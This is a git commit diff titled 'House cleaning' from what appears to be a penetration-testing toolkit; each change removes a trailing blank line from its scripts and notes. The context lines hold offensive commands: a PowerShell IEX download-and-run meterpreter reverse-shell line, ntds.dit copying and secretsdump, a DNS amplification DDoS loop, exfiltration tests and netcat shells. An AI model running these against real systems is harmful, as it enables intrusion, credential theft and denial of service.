House cleaning.

active.sh

@@ -220,4 +220,3 @@ echo "***Scan complete.***"
 echo
 echo
 echo -e "The supporting data folder is located at ${YELLOW}$home/data/$domain/${NC}\n"
-

directObjectRef.sh

@@ -24,4 +24,3 @@ echo "***Scan complete.***"
 echo
 echo
 echo -e "The new report is located at ${YELLOW}$home/data/DirectObjectRef.txt${NC}\n"
-

discover.sh

@@ -670,4 +670,3 @@ export -f f_main
 ###############################################################################################################################
 
 while true; do f_main; done
-

domain.sh

@@ -70,4 +70,3 @@ case $recon in
 
      *) f_error;;
 esac
-

generateTargets.sh

@@ -108,4 +108,3 @@ exit
 ###############################################################################################################################
 
 while true; do f_targets; done
-

listener.sh

@@ -81,4 +81,3 @@ sed -i "s/ccc/$lport/g" /tmp/listener.rc
 
 echo
 msfconsole -q -r /tmp/listener.rc
-

misc/crack-wifi.sh

@@ -734,4 +734,3 @@ fi
 
 # Program
 f_start
-

misc/crawl.sh

@@ -47,4 +47,3 @@ rm index.html tmp*
 
 echo
 echo
-

misc/netblocks.txt

@@ -159,4 +159,3 @@ CIDR:           174.0.0.0/13
 
 OrgName:        Sprint
 CIDR:           208.0.0.0/11, 208.32.0.0/14
-

mods/crtsh_enum_psql.py

@@ -120,4 +120,3 @@ def main(domain, resolve, output):
 
 if __name__ == '__main__':
     main()
-

mods/goog-mail.py

@@ -64,4 +64,3 @@ def StripTags(text):
 
 for uniq_emails_web in list(d.keys()):
     print(uniq_emails_web+"")
-

mods/goohost.sh

@@ -509,4 +509,3 @@ rm -f result-$TMPRND.log 2> /dev/null
 rm -f /tmp/goohost*-$TMPRND.log 2> /dev/null
 rm -f /tmp/random-$TMPRND.log 2> /dev/null
 rm -f /tmp/top6-$TMPRND.log 2> /dev/null
-

mods/virustotal_subdomain_enum.py

@@ -42,4 +42,3 @@ def print_results(search_results):
         print_results(search_results)
     except KeyboardInterrupt:
         print('CTRL + C detected, quiting.')
-

msf-aux.sh

@@ -511,4 +511,3 @@ else
      rm $name/master.rc
      rm tmpmsf
 fi
-

multiTabs.sh

@@ -119,4 +119,3 @@ case $choice in
      *) f_error;;
 esac
 }
-

newModules.sh

@@ -71,4 +71,3 @@ echo
 echo $medium
 echo
 echo -e "The new report is located at ${YELLOW}$home/data/new-modules.txt${NC}\n"
-

nikto.sh

@@ -85,4 +85,3 @@ echo "***Scan complete.***"
 echo
 echo
 echo -e "The new report is located at ${YELLOW}$home/data/nikto/${NC}\n"
-

notes/Cobalt-Strike.txt

@@ -498,4 +498,3 @@ psexec_psh site-dc smb
 Right-click on the new http Beacon > Interact
 sleep 2
 note 3rd hop
-

notes/PowerShell/Empire.txt

@@ -219,4 +219,3 @@ wmic /?
 switch-name /?
 wmic qfe get Caption,Description,HotFixID,InstalledOn
 wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
-

notes/PowerShell/PS-Attack.txt

@@ -41,4 +41,3 @@ Get-Attack copy
 Get-Help Invoke-NinjaCopy -Examples
 Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit"     ComputerName <DC> -LocalDestination "C:\ntds.dit"
 ls
-

notes/PowerShell/PowerView.txt

@@ -348,4 +348,3 @@ BSides LV 2016             Building an EmPyre with Python
 DerbyCon 2016              A Year in the Empire                                             www.youtube.com/watch?v=ngvHshHCt_8
 DerbyCon 2016              Living Off the Land 2 A Minimalists Guide to Windows Defense     www.youtube.com/watch?v=dt-wMJwpX7g
 DerbyCon 2016              Attacking EvilCorp: Anatomy of a Corporate Hack                  www.youtube.com/watch?v=nJSMJyRNvlM
-

notes/PowerShell/basic.txt

@@ -127,4 +127,3 @@ python3 -m http.server 80
 - Windows execute a remote file in memory
 powershell -nop -exec bypass
 IEX "(New-Object Net.WebClient).DownloadString('http://192.168.1.5/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.5 -Lport 443 -Force"
-

notes/active-directory.txt

@@ -346,4 +346,3 @@ chmod 755 *.py
 
 cd ../zerologon-virtualenv/bin/
 secretsdump.py -no-pass -just-dc lab.corp/dc-1\[email protected]
-

notes/buffer-overflows.txt

@@ -195,4 +195,3 @@ run `python -c 'print "\x41" * 504 + "\x42" * 4'`
 y
 x/16wx $esp # not sure what this does
 info registers
-

notes/cidr.txt

@@ -39,4 +39,3 @@ Class   Start          End                IPs           Comment
 A       10.0.0.0       10.255.255.255     16,777,216      1 single Class A
 B       172.16.0.0     172.31.255.255      1,048,544     16 contiguous Class Bs
 C       192.168.0.0    192.168.255.255        65,534    256 contiguous Class Cs
-

notes/consulting.txt

@@ -35,4 +35,3 @@ Consulting
     Control the client and the engagement, don’t let them control you.
     Hovering
     You are not there to teach.
-

notes/dns.txt

@@ -38,4 +38,3 @@ nslookup www.nsa.gov <nameserver IP>
 # Spoofed request amplification DDoS
 
 for i in `cat 53.txt`; do dig @"$i" . NS; done > AmpDDoS.txt
-

notes/egress.txt

@@ -67,4 +67,3 @@ Invoke-EgressAssess -Client http -Port 8000 -IP <server> -Datatype ni -Size 5 -F
 Invoke-EgressAssess -Client ftp -IP <server> -Username lee -Password hack -Datatype "c:\Users\lee\secret.txt"
 
 Note: Comcast blocks port 25 and 445. If you are testing smtp or smb, use alternate ports.
-

notes/empire.txt

@@ -198,4 +198,3 @@ info
 set HostName <IP>
 set Recurse True
 execute
-

notes/exploits.txt

@@ -32,4 +32,3 @@ i586-mingw32msvc-gcc adduser.c -o adduser.exe              Cross compile a Windo
 
 Select Desktop developement with C++
 On the right, select C++/CLI support for v143 buile tools
-

notes/forensics.txt

@@ -111,4 +111,3 @@ fdisk -l     Show info about hard drive and partitions
 3. magicrescue –r jpeg-jfif foundfiles /dev/sda1 (or whatever device name is) 
 4. cd foundfiles && ls 
 5. kolorpaint name of jpg file.jpg
-

notes/git.txt

@@ -63,4 +63,3 @@ git config --global pull.rebase false
 # Submit a pull request.
 
     Using your web browser, click on Pull request > Create pull request 2x
-

notes/insecure-protocols.txt

@@ -75,4 +75,3 @@ xdotool key t
 xdotool key e
 xdotool key r
 xdotool key m
-

notes/kali.txt

@@ -217,4 +217,3 @@ apache2ctl -M                              Verity the ssl_module is running
 netstat -antp                              Verify ports 80 and 443 are listening
 
 xdg-open http://www.acme.org               Verify redirect and SSL are working
-

notes/ldap-owa.txt

@@ -109,4 +109,3 @@ ldapsearch -x -h <IP> -D 'DOMAIN\username' -w 'password' -b "CN=Remote Desktop U
 
 https://github.com/franc-pentest/ldeep
 https://github.com/codewatchorg/PowerSniper
-

notes/maltego.txt

@@ -39,4 +39,3 @@ Select all websites > Run Transform > All Transforms > To IP Address [DNS]
 RC > Run Transform > DNS from Domain > All in this set
 Select all  > Run Transform > All Transforms > To IP Address [DNS]
 Select all  IP addresses > Run Transform > All Transforms > To Netblock [Using whois info]
-

notes/mobile.txt

@@ -17,4 +17,3 @@ password: alpine
 
 iExplorer $35
 www.macroplant.com/iexplorer
-

notes/nexpose.txt

@@ -95,4 +95,3 @@ ORDER BY da.ip_address, dv.title
 SELECT title AS "Title", ROUND(cvss_score::numeric, 1) AS "CVSS Score"
 FROM dim_vulnerability
 ORDER BY title
-

notes/nmap-fire.txt

@@ -108,4 +108,3 @@ stun                             3478
 sun_service_tags                 6481
 upnp                             1900
 xworks                           17185
-

notes/osx.txt

@@ -73,4 +73,3 @@ System Integrity Protection status: enabled.
 # Update locate database
 
 sudo /usr/libexec/locate.updatedb
-

notes/passwords.txt

@@ -171,4 +171,3 @@ wce.exe -g <cleartext password>
 
 How can I write hashes obtained by WCE to a file?
 wce.exe -o hashes.txt
-

notes/pwk.txt

@@ -453,4 +453,3 @@ nc -lvnp 443
 - Windows
 Open IE to 192.168.1.5/exploit.html
 nc -nv 192.168.1.11 443
-